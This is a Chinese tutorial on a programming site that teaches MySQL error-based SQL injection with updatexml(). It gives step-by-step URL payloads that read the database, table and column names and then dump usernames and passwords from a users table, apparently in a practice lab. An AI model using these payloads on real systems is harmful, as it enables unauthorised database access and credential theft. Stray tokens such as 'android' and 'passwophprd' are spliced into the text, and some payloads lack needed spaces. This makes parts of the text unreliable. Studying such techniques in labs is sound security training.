SQL报错注入之updatexml的实现

2024-10-31 09:09 数据库作者：半ོ糖ོ

1.updatexml报错原理

updatexml(xml_doument,XPath_string,new_value)

第一个参数：XML的内容

第二个参数：是需要update的位置XPATH路径

第三个参数：是更新后的内容

所以第一和第三个参数可以随便写，只需要利用第二个参数，他会校验你输入的内容是否符合XPATH格式，当我们输入一个不符合xpath语法的语句就报错了，我们注入利用的就是这一点。

2.判断是否有注入点

我们在地址栏中输入?id=1'

SQL报错注入之updatexml的实现

我们在地址栏中输入?id=1'--+

SQL报错注入之updatexml的实现

根据结果可以判断出存在数字型注入，并且页面会打印出报错信息，所以我们可以利用报错注入来解决

3.updatexml报错注入

3.1爆库名

?id=1 and updatexml(1,concat(0x7e,database(),0x7e),0)

SQL报错注入之updatexml的实现

0x7e表示~符号，所以数据库名为security

3.2爆表名

mysql 中js的 information_schema 这个库就像时MYSQL的信息数据库，他保存着mysql 服务器所维护的所有其他的数据库信息，包括了库名，表名，列名。

在注入时，information_schema库的作用就是获取 table_schema table_name, column_name .

这些数据库内的信息。如果information_schema库被过滤掉，还可以尝试使用下述库来代替

sys.schema_auto_increment_columns

sys.schema_table_statistics_witpythonh_buffer

mysql.innodb_table_stats

mysql.innodb_table_index

?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)

SQL报错注入之updatexml的实现

根据结果可知当前security库下有四张表，并且users表最有可能存放用户信息

3.3爆字段名

我们通android过sql语句查询知道当前数据库有四个表，根据表名知道可能用户的账户和密码是在users表中。接下来我们就是得到该表下的字段名以及内容。

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)

SQL报错注入之updatexml的实现

根据结果可以判断出字段名不全，这是因为updataxml函数只显示32位，所以我们可以用substr函数来慢慢截取来获得所有的字段名

?id=1 and updatexml(1,concat(0x7e,(select substr(group_concat(column_name),1,32) frominformation_schema.columns where table_name='users'),0x7e),1)

SQL报错注入之updatexml的实现

这样我们最终会得到所有的字段名

如果我们给select语句多加一个where条件会变成什么样呢？

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)

SQL报错注入之updatexml的实现

此次查询直接就爆出users表的列名，可以得到两个敏感字段就是username和password，最有可能存放用户的账号密码

3.4爆数据

?id=1 and updatexml(1,concat(0x7e,(select password from users limit1,1),0x7e),1)

SQL报错注入之updatexml的实现

通过limit函数可以爆出各个用户的密码

当然也可以通过刚刚所述的substr函数来截取密码

?id=1 and updatexml(1,concat(0x7e,(select substr(group_concat(username,id,passwophprd),1,20) from users),0x7e),1)

SQL报错注入之updatexml的实现

此次updatexml报错注入就结束啦！

到此这篇关于SQL报错注入之updatexml的实现的文章就介绍到这了,更多相关SQL updatexml内容请搜索编程客栈(www.devze.com)以前的文章或继续浏览下面的相关文章希望大家以后多多支持编程客栈(www.devze.com)！

继续阅读：SQL updatexml

SQL报错注入之updatexml的实现

目录

1.updatexml报错原理

2.判断是否有注入点

3.updatexml报错注入

3.1爆库名

3.2爆表名

3.3爆字段名

3.4爆数据

更多精彩内容

精彩评论

最新数据库

SQL server 中 CROSS APPLY的使用及用途

MySQL学习之DDL数据库定义与操作

mysql通过生日计算年龄的实现方法

MySQL8.0版本如何正确的使用窗口函数详解

MySQL密码策略管理插件validate_password用法详解

数据库排行榜

Hadoop Key Management Server (KMS)配置及测试

spark报错ERROR ObjectStore: Version information found in metastore differs 2.1.0 from expected schema version 1.2.0. Schema verififcation is disabled hive.metastore.schema.verification so setting version.

解决Navicat远程连接MySQL出现 10060 unknow error的方法

redis-cluster集群调优之cluster-require-full-coverage参数

Navicat连接Oracle数据库的详细步骤与注意事项